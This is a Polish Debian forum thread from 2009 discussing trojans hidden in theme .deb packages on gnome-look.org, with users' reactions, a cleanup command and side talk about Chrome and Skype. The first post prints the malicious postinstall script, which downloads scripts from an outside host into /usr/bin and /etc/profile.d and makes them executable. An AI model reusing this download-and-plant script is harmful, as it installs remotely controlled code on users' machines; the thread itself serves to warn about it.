Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!

Ogłoszenie

Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundacji Dzieciom zdazyć z Pomocą.
Więcej informacji na dug.net.pl/pomagamy/.

Strony: 1

 

#1  2009-12-11 13:08:35

  azhag - Admin łajza

azhag
Admin łajza
Skąd: Warszawa
Zarejestrowany: 2005-11-15

Wirusy na gnome-look.org

Chodzi o skrypt, który wykonuje się w systemie podczas instalacji z paczki Deb i wygląda następująco:

Kod:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

[/quote]
http://www.ubucentrum.net/2009/12/trojany-w-ukryte-w-motywach-zagrazaja.html

Błogosławieni, którzy czynią FAQ.
[url=http://www.opencaching.pl]opencaching[/url] :: [url=http://dug.net.pl/sources.list]debian sources.list[/url] :: [url=http://www.linuxportal.pl/blogi/azhag/wpisy]coś jakby blog[/url] :: [url=http://dug.net.pl/]polski portal debiana[/url] :: linux user #403712

Offline

 

#2  2009-12-11 14:18:50

  ilin - Palacz

ilin
Palacz
Skąd: PRLu
Zarejestrowany: 2006-05-03

Re: Wirusy na gnome-look.org

Zawsze mówiłem ze gnome to zło :)

[b]Problemy rozwiązujemy na forum nie na PW[/b] -> Niech inni na tym skorzystają.
[url=http://dug.net.pl/]Polski portal Debiana[/url]

Offline

 

#3  2009-12-11 14:21:10

  marg1 - Gentoowy Głupek

marg1
Gentoowy Głupek
Skąd: Bytom
Zarejestrowany: 2009-05-15

Re: Wirusy na gnome-look.org

Ale jak tak można robić już nawet na Linuksie trzeba uważać? Ja pier.... :[

marg1@jid.dug.net.pl
Linux User Registration Number: #488674
CISCO CCNA Alumni :)

Offline

 

#4  2009-12-11 14:31:12

  azhag - Admin łajza

azhag
Admin łajza
Skąd: Warszawa
Zarejestrowany: 2005-11-15

Re: Wirusy na gnome-look.org

[quote=marg1]już nawet na Linuksie trzeba uważać?[/quote]
Zawsze trzeba uważać, podczas dodawania czegokolwiek z niepewnego źródła.

Błogosławieni, którzy czynią FAQ.
[url=http://www.opencaching.pl]opencaching[/url] :: [url=http://dug.net.pl/sources.list]debian sources.list[/url] :: [url=http://www.linuxportal.pl/blogi/azhag/wpisy]coś jakby blog[/url] :: [url=http://dug.net.pl/]polski portal debiana[/url] :: linux user #403712

Offline

 

#5  2009-12-11 14:45:36

  k4misiek - Green Reaper

k4misiek
Green Reaper
Skąd: Poznań
Zarejestrowany: 2006-11-11

Re: Wirusy na gnome-look.org

Dlatego nigdy nie instaluje pakietów z poza oficjalnego repo... dobra skłamałem. Używałem kontrolki głośności z Hag GNU/Linux ;)
Tak przy okazji, jak oprogramowanie jest dobre i użyteczne... [b]azhag[/b] czy twój aplet głośności który usadawia się w tacce systemowej wykorzystany w Hagu wraz z hag-fluxbox-exit mogą wejść do oficjalnego repozytorium Debiana ?

You are registered as user [b]#464141[/b] with the Linux Counter

Offline

 

#6  2009-12-11 15:11:39

  azhag - Admin łajza

azhag
Admin łajza
Skąd: Warszawa
Zarejestrowany: 2005-11-15

Re: Wirusy na gnome-look.org

[quote=sp3cu][b]azhag[/b] czy twój aplet głośności który usadawia się w tacce systemowej wykorzystany w Hagu wraz z hag-fluxbox-exit mogą wejść do oficjalnego repozytorium Debiana ?[/quote]
Aplet miksera nie jest mój, zaś [tt]hag-exit-fluxbox[/tt] czekają poważne zmiany.

Może kiedyś, jak znajdę kogoś kto zasponsoruje moje pakiety, wprowadzę to czy tamto.

Błogosławieni, którzy czynią FAQ.
[url=http://www.opencaching.pl]opencaching[/url] :: [url=http://dug.net.pl/sources.list]debian sources.list[/url] :: [url=http://www.linuxportal.pl/blogi/azhag/wpisy]coś jakby blog[/url] :: [url=http://dug.net.pl/]polski portal debiana[/url] :: linux user #403712

Offline

 

#7  2009-12-13 16:32:45

  ippo76 - fakam fszycho

ippo76
fakam fszycho
Zarejestrowany: 2009-02-22
Serwis

Re: Wirusy na gnome-look.org

Ha,
właśnie po zainstalowaniu kilku motywów z gnome.look miałem problemy z zawieszaniem kompa - wybrałem sobie kilka nowo zainstalowanych* motywów do losowego wyświetlania i jeden z nich (podejrzewam motyw CBA, linkowałem go bodajże w "Humorze") zawieszał mi system, gdy próbowałem się z mojego usera zalogować w okienku na drugiego (Aplikacje>Narzędzia systemowe>Nowe logowanie w oknie).

Nie sądzę, żeby to był jakiś wirus czy inne dziadostwo, raczej spartaczony motyw, ale mogę się mylić. Dlatego pożegnałem wszystkie motywy z gnome.look (choć tych z Adrianą Lima było mi szkoda ;)  ).


* bo te defaultowe są smutne i brzydkie

ippo76@jid.dug.net.pl

Moja składka do ZUS = 2/3, moja składka do OFE = 1/3;
Stan mojego konta w ZUS = 2XYZ, stan konta w OFE = 3XYZ.

Offline

 

#8  2009-12-23 17:11:55

  qluk - Pan inż. Cyc

qluk
Pan inż. Cyc
Skąd: Katowice
Zarejestrowany: 2006-05-22

Re: Wirusy na gnome-look.org

Najsmieszniejsze jest to, ze nigdzie nie moge znalezc tych skrytpow co je sciaga. Trudno ocenic wiec co to za zagrozenie nie wiedzac co zostaje pobrane. Na dobra sprawe to moze byc nawet plotka puszczona w obieg zeby udowodnic jakies zagrozenia na linuxie. No i co to jest za "rozwiazanie" problemu

Kod:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

Usuniecie skryptow i nie zastapienie ich oryginalami do tego "index.php" ? Skad on ma byc usuniety bo wg. tego z lokacji w ktorej sie wlasnie znajdujemy.
----po glebszym googlowaniu i klikaniu w kolejne linki-------
http://404.g-net.pl/?p=1412   
Wyglada to dziwacznie, bo z tego co widac to jedyne to ping na jakims dziwnym porcie, do strony na ktorej miedzy innymi pisza o tym jak zrobic phishing do wow'a.

------

Za to z tego co przypadkiem znalazlem na inych forach:

Niestety ostatnio udostępniona instalka (.deb) Google Chrome beta dla Linuksa zachowuje się prawie identycznie:
- do sources.list dodaje:
deb http://dl.google.com/linux/deb/ stable main
- do keyringu apta dodaje klucz Googli:
pub 1024D/7FAC5991 2007-03-08
uid Google, Inc. Linux Package Signing Key
sub 2048g/C07CB649 2007-03-08
- do /etc/cron.daily wrzuca skrypt, który sprawdza czy dwie powyższe rzeczy są zrobione i jak nie to je robi…[/quote]
Jak znajde chwile wolnego czasu to postaram sie potwierdzic badz zaprzeczyc, chyba ze ktos to zrobi w miedzy czasie :)

Przy okazji wyszperal mi sie ciekawy watek odnosnie skype (tez nie sprawdzalem jeszcze) http://forum.suse.pl/index.php?/topic,21233.0.html
I tutaj link ktory jest rowniez tam podany (ang.; IMHO bardzo dobrze opisuje sytuacje) http://nic.phys.ethz.ch/news/1106655341/index_html

Ostatnio edytowany przez qluk (2009-12-23 17:25:13)

Offline

 

#9  2009-12-23 17:26:47

  bns - unknown

bns
unknown
Zarejestrowany: 2005-12-25
Serwis

Re: Wirusy na gnome-look.org

[quote=qluk][..]Przy okazji wyszperal mi sie ciekawy watek odnosnie skype (tez nie sprawdzalem jeszcze) http://forum.suse.pl/index.php?/topic,21233.0.html[..][/quote]
Skype to zło! Od początku o nim głośno. W 2006 na BlackHat poruszyli temat łączenia się tego badziewia z nieznanymi adresami IP.

Pozdrawiam,
[url=http://banasiak.me]bns[/url]

Offline

 

 

Strony: 1

Stopka forum

Powered by PunBB
© Copyright 2002–2005 Rickard Andersson
To nie jest tylko forum, to nasza mała ojczyzna ;-)

[ Generated in 0.010 seconds, 12 queries executed ]

Informacje debugowania

Time (s) Query
0.00008 SET CHARSET latin2
0.00004 SET NAMES latin2
0.00090 SELECT u.*, g.*, o.logged FROM punbb_users AS u INNER JOIN punbb_groups AS g ON u.group_id=g.g_id LEFT JOIN punbb_online AS o ON o.ident='3.12.154.133' WHERE u.id=1
0.00092 REPLACE INTO punbb_online (user_id, ident, logged) VALUES(1, '3.12.154.133', 1732937624)
0.00049 SELECT * FROM punbb_online WHERE logged<1732937324
0.00066 DELETE FROM punbb_online WHERE ident='18.188.175.66'
0.00051 SELECT topic_id FROM punbb_posts WHERE id=136253
0.00151 SELECT id FROM punbb_posts WHERE topic_id=15704 ORDER BY posted
0.00079 SELECT t.subject, t.closed, t.num_replies, t.sticky, f.id AS forum_id, f.forum_name, f.moderators, fp.post_replies, 0 FROM punbb_topics AS t INNER JOIN punbb_forums AS f ON f.id=t.forum_id LEFT JOIN punbb_forum_perms AS fp ON (fp.forum_id=f.id AND fp.group_id=3) WHERE (fp.read_forum IS NULL OR fp.read_forum=1) AND t.id=15704 AND t.moved_to IS NULL
0.00005 SELECT search_for, replace_with FROM punbb_censoring
0.00078 SELECT u.email, u.title, u.url, u.location, u.use_avatar, u.signature, u.email_setting, u.num_posts, u.registered, u.admin_note, p.id, p.poster AS username, p.poster_id, p.poster_ip, p.poster_email, p.message, p.hide_smilies, p.posted, p.edited, p.edited_by, g.g_id, g.g_user_title, o.user_id AS is_online FROM punbb_posts AS p INNER JOIN punbb_users AS u ON u.id=p.poster_id INNER JOIN punbb_groups AS g ON g.g_id=u.group_id LEFT JOIN punbb_online AS o ON (o.user_id=u.id AND o.user_id!=1 AND o.idle=0) WHERE p.topic_id=15704 ORDER BY p.id LIMIT 0,25
0.00085 UPDATE punbb_topics SET num_views=num_views+1 WHERE id=15704
Total query time: 0.00758 s